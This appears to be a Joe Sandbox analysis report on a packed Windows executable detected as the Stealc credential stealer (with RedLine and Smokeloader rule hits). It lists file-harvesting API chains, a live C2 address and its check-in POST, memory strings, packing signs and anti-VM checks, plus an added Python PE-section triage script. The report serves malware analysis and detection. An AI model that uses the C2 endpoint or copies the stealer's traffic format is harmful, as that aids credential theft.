Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02451977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02463D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.235.128.16:80
Source: Malware configuration extractor | URLs: http://185.235.128.16/562c1eb14955c897.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.235.128.16
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /562c1eb14955c897.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
    Host: 185.235.128.16
    Content-Length: 217
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii (body, CRLF-separated):
    ------HJJJDAEGIDHCBFHJJJEG
    Content-Disposition: form-data; name="hwid"

    C12AD95500561166170430
    ------HJJJDAEGIDHCBFHJJJEG
    Content-Disposition: form-data; name="build"

    LogsDiller
    ------HJJJDAEGIDHCBFHJJJEG--
Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49743
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49737
Source: unknown | TCP traffic detected without corresponding DNS query: 185.235.128.16 (reported eight times)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1 (same headers and multipart body as the global traffic POST entry above)
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.php
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.php4
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpQ
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpk
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.phpx
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/562c1eb14955c897.php~M
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16/ws
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.235.128.16e
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop

System Summary

Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code functions: 0_2_024982DF, 0_2_024C134F, 0_2_024CA08F, 0_2_024AB1CF, 0_2_024811DF, 0_2_024BA19F, 0_2_024936EF, 0_2_024DA76F, 0_2_0248F4FF, 0_2_024AA5FF, 0_2_0248159F, 0_2_024BCA0F, 0_2_02493A0F, 0_2_024C9AAF, 0_2_024D8B64, 0_2_02495B2F, 0_2_024CC805, 0_2_0247D9AB, 0_2_024BFFEF, 0_2_024C5C00, 0_2_024AAD0F, 0_2_024BED3D
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: String function: 00404610 appears 317 times
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332
Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: XJQkTVvJ3I.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@0/1
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LA0MCOFI.htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6588
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3a5ad177-a066-44d0-8e16-7a20bf0a7aaa
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: XJQkTVvJ3I.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\XJQkTVvJ3I.exe "C:\Users\user\Desktop\XJQkTVvJ3I.exe"
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Data Obfuscation

Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Unpacked PE file: 0.2.XJQkTVvJ3I.exe.400000.1.unpack .text:ER;.data:W;.filidow:R;.yegih:R;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .filidow
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .yegih
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0084241D push 7D7C6160h; retf 0_2_00842422
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024D9280 push ecx; ret 0_2_024D9293
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0246B59C push ecx; ret 0_2_0246B5AF
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .text entropy: 7.617064064595542
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
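The rows above are the usual picture of a packed PE: two sections with names no linker produces (.filidow, .yegih), a .text section whose entropy of 7.62 bits per byte is well above the 6 to 6.5 typical of compiled x86 code, and a .text section that is executable-and-readable in one section table but writable-and-executable in the other (".text:ER" vs ".text:EW"), which is what a stub that decrypts code in place needs. Entropy alone can also mean an embedded compressed resource; here it is corroborated by the "changes PE section rights" and "overwrites its own PE header" signatures. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it assembles a minimal PE32 image (constructed test input, not the analysed file) from a list of sections, then walks the section table and applies those three checks. The standard-name list, the 7.0 threshold and all section contents are the example's own choices.

```python
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a normal MSVC/MinGW link produces; anything else deserves a look (example's own list).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def flag_string(chars: int) -> str:
    """Render section rights the way the report does (E, R, W)."""
    return ("E" if chars & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if chars & IMAGE_SCN_MEM_READ else "") + \
           ("W" if chars & IMAGE_SCN_MEM_WRITE else "")


def parse_sections(pe: bytes):
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = \
            struct.unpack_from("<8sIIIIIIHHI", pe, table + i * 40)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "rights": flag_string(chars), "chars": chars,
                         "entropy": shannon_entropy(raw)})
    return sections


def triage(pe: bytes, entropy_threshold: float = 7.0):
    """Return (section, finding) pairs for the three packer tells discussed above."""
    findings = []
    for s in parse_sections(pe):
        if s["name"] not in STANDARD_SECTIONS:
            findings.append((s["name"], "nonstandard-name"))
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append((s["name"], "write+execute"))
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > entropy_threshold:
            findings.append((s["name"], "high-entropy-code"))
    return findings


def build_sample_pe(sections):
    """Assemble a minimal PE32 (headers, section table, raw data) from
    (name, data, characteristics) tuples. Constructed test input only: no
    entry point, no imports, not meant to run."""
    opt_size, file_align = 224, 0x200
    header_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_start = -(-header_len // file_align) * file_align        # round up to file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)     # PE32 magic, rest zeroed
    table, blobs, ptr = b"", b"", raw_start
    for i, (name, data, chars) in enumerate(sections):
        padded = data + b"\0" * (-len(data) % file_align)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             0x1000 * (i + 1), len(padded), ptr, 0, 0, 0, 0, chars)
        blobs += padded
        ptr += len(padded)
    image = dos + b"PE\0\0" + coff + opt + table
    return image + b"\0" * (raw_start - len(image)) + blobs


# Constructed sample mirroring the report's layout: an "encrypted", self-modifying
# .text plus two oddly named sections. Seeded pseudo-random bytes stand in for the
# packed code; 0x20 = CNT_CODE, 0x40 = CNT_INITIALIZED_DATA.
_rng = random.Random(7)
SAMPLE_PE = build_sample_pe([
    (".text", bytes(_rng.getrandbits(8) for _ in range(4096)),
     IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | 0x20),
    (".filidow", b"stub-data-" * 100, IMAGE_SCN_MEM_READ | 0x40),
    (".yegih", b"\0" * 512, IMAGE_SCN_MEM_READ | 0x40),
    (".data", b"Hello, World\0" * 40, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
    (".rsrc", b"RSRC" * 128, IMAGE_SCN_MEM_READ | 0x40),
    (".reloc", b"\0\x10\0\0" * 64, IMAGE_SCN_MEM_READ | 0x40),
])

if __name__ == "__main__":
    for s in parse_sections(SAMPLE_PE):
        print(f"{s['name']:<9} {s['rights']:<3} entropy={s['entropy']:.3f}")
    for name, why in triage(SAMPLE_PE):
        print(f"  {name}: {why}")
```

To use it on a real file, replace SAMPLE_PE with the bytes of the sample and, for the "after unpacking" side, with the bytes of a process dump; the rights comparison between the two is what the report's "changes PE section rights" signature encodes.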
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)

                      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-44682)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Evaded block: after key decision (graph_0-45842)
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | API coverage: 6.7 %
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,LCMapStringW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02464357
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0245F087
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0245C0A7
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245E177
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0245E797
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245FA17
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02464A27
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02451977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02451977
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02463D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02463D67
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_02464DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02464DC7
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_0245DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0245DDE7
Source: C:\Users\user\Desktop\XJQkTVvJ3I.exe | Code function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWu
Source: Amcache.hve.3.dr | Binary or memory string: VMware
